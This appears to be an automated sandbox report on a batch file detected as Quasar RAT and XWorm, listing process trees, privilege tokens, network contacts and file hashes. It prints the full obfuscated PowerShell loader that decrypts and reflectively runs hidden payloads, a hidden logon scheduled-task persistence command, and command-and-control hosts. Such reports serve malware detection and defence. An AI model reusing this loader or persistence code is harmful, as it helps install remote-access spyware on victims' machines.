Malware Analysis Report

2024-10-23 21:29

Sample ID 240414-s6sevace71
Target Client-built.bat
SHA256 950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9
Tags
quasar xworm office04 rat spyware trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9

Threat Level: Known bad

The file Client-built.bat was found to be: Known bad.

Malicious Activity Summary

quasar xworm office04 rat spyware trojan

Xworm

Detect Xworm Payload

Quasar RAT

Quasar payload

Blocklisted process makes network request

Checks computer location settings

Executes dropped EXE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-14 15:44

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-14 15:44

Reported

2024-04-14 15:45

Platform

win7-20240319-en

Max time kernel

41s

Max time network

15s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1620 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 2300 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client-built.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

N/A

Files

memory/2300-4-0x000000001B160000-0x000000001B442000-memory.dmp

memory/2300-6-0x000007FEF5980000-0x000007FEF631D000-memory.dmp

memory/2300-5-0x0000000002620000-0x0000000002628000-memory.dmp

memory/2300-7-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/2300-8-0x000007FEF5980000-0x000007FEF631D000-memory.dmp

memory/2300-9-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/2300-10-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/2300-11-0x0000000002550000-0x00000000025D0000-memory.dmp

memory/2300-12-0x000007FEF5980000-0x000007FEF631D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-14 15:44

Reported

2024-04-14 15:45

Platform

win10v2004-20240412-en

Max time kernel

58s

Max time network

64s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-553605503-2331009851-2137262461-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-553605503-2331009851-2137262461-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3720 wrote to memory of 1844 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3720 wrote to memory of 1844 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1844 wrote to memory of 4536 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1844 wrote to memory of 4536 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1844 wrote to memory of 3748 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1844 wrote to memory of 3748 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 3748 wrote to memory of 2948 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3748 wrote to memory of 2948 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2948 wrote to memory of 2224 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2948 wrote to memory of 2224 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2224 wrote to memory of 3880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe
PID 2224 wrote to memory of 3880 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client-built.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_334_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_334.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_334.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_334.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_334.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_334.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

"C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 22.186.200.23.in-addr.arpa udp
US 8.8.8.8:53 express-divorce.gl.at.ply.gg udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 traffic-collins.gl.at.ply.gg udp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 147.185.221.18:22562 express-divorce.gl.at.ply.gg tcp
US 147.185.221.19:24820 traffic-collins.gl.at.ply.gg tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yyhp30qw.aod.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1844-10-0x00007FF9D6600000-0x00007FF9D70C1000-memory.dmp

memory/1844-11-0x000001C0E9EA0000-0x000001C0E9EB0000-memory.dmp

memory/1844-5-0x000001C0EBFC0000-0x000001C0EBFE2000-memory.dmp

memory/1844-12-0x000001C0E9EA0000-0x000001C0E9EB0000-memory.dmp

memory/1844-13-0x000001C0E9EA0000-0x000001C0E9EB0000-memory.dmp

memory/1844-14-0x000001C0EBF90000-0x000001C0EBF98000-memory.dmp

memory/1844-15-0x000001C0EC320000-0x000001C0EC45A000-memory.dmp

memory/4536-22-0x00007FF9D6600000-0x00007FF9D70C1000-memory.dmp

memory/4536-27-0x0000025D3FC10000-0x0000025D3FC20000-memory.dmp

memory/4536-28-0x0000025D3FC10000-0x0000025D3FC20000-memory.dmp

memory/4536-29-0x0000025D3FC10000-0x0000025D3FC20000-memory.dmp

memory/4536-32-0x00007FF9D6600000-0x00007FF9D70C1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 68dc886431c7bc43c168ee2f2349dfa9
SHA1 2fd61cfdeaf52ee2ccd902ff1cc3e5c08f426ccc
SHA256 944abd73b0e4b30b22863d73594cac5fbcf4de64469d13dd1e3a3ca8cf85440e
SHA512 97c55d61e2df6d2f7a858347ad6e1cecbfc26c3b5863850092b9625e549408c053f0787ae267bfdc403907081a1458e6d39acc897c869c3460bd003a865185a6

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 661739d384d9dfd807a089721202900b
SHA1 5b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA256 70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA512 81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

C:\Users\Admin\AppData\Roaming\startup_str_334.vbs

MD5 24c7af433b8a5127b679964343181505
SHA1 57bedc4d405eed838f67a880fb22e9e921979589
SHA256 badbe5b3ed31eb7b68cdcf1d45a0750726410b72dddd696a9b87be41cf36a23f
SHA512 ae45c43d23d87b71bba02b28bab466cd91e767335f21e4d49b21a9705b26f9bc5b5288dbb9bc1d4a6081cbbc346bd170ab5a85613a2907dce6d816978f15f0ed

C:\Users\Admin\AppData\Roaming\startup_str_334.bat

MD5 566c653ae6a704041aef596fce6d6a8c
SHA1 da35608bf372a6113d941817a96bc3a17de9ef69
SHA256 950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9
SHA512 98662e33f746dce81efe530f6544bf0d83eff2ff35d72bf54e105ef6de121108a4aa28d6e417d3c8e1584a5c0165f78b180574eaa489f11d7cd617b6d31e01c2

memory/1844-41-0x00007FF9D6600000-0x00007FF9D70C1000-memory.dmp

memory/2224-42-0x00007FF9D6600000-0x00007FF9D70C1000-memory.dmp

memory/2224-43-0x000002624EF90000-0x000002624EFA0000-memory.dmp

memory/2224-44-0x000002624EF90000-0x000002624EFA0000-memory.dmp

memory/2224-57-0x00000262515B0000-0x00000262518D4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XClientNOT.exe

MD5 dd466e4e324143a67a406797c23ee2bc
SHA1 cc369b99c18c9322734b14908e7b21f2bec48118
SHA256 1a87f2fed2a9263e703c44d25da8242016a640db930678a0f497879267c133c8
SHA512 603c082427129deac3bce210d87e3f4125dd429ad7fe13422b7a3d80f8e282ae8ad887a20e47de12a3f90c24ab4a143dc3b069fd8da122f4f96b70f94bd7f438

memory/3880-68-0x00007FF9D6600000-0x00007FF9D70C1000-memory.dmp

memory/3880-69-0x0000000000DD0000-0x0000000000DDE000-memory.dmp

memory/2224-70-0x0000026251F00000-0x0000026251F50000-memory.dmp

memory/2224-71-0x0000026252310000-0x00000262523C2000-memory.dmp

memory/2224-72-0x00000262525A0000-0x0000026252762000-memory.dmp

memory/3880-73-0x0000000002DB0000-0x0000000002DC0000-memory.dmp

memory/2224-74-0x00007FF9D6600000-0x00007FF9D70C1000-memory.dmp

memory/2224-75-0x000002624EF90000-0x000002624EFA0000-memory.dmp

memory/2224-76-0x000002624EF90000-0x000002624EFA0000-memory.dmp

memory/2224-77-0x000002624EF90000-0x000002624EFA0000-memory.dmp

memory/3880-78-0x00007FF9D6600000-0x00007FF9D70C1000-memory.dmp

memory/3880-79-0x0000000002DB0000-0x0000000002DC0000-memory.dmp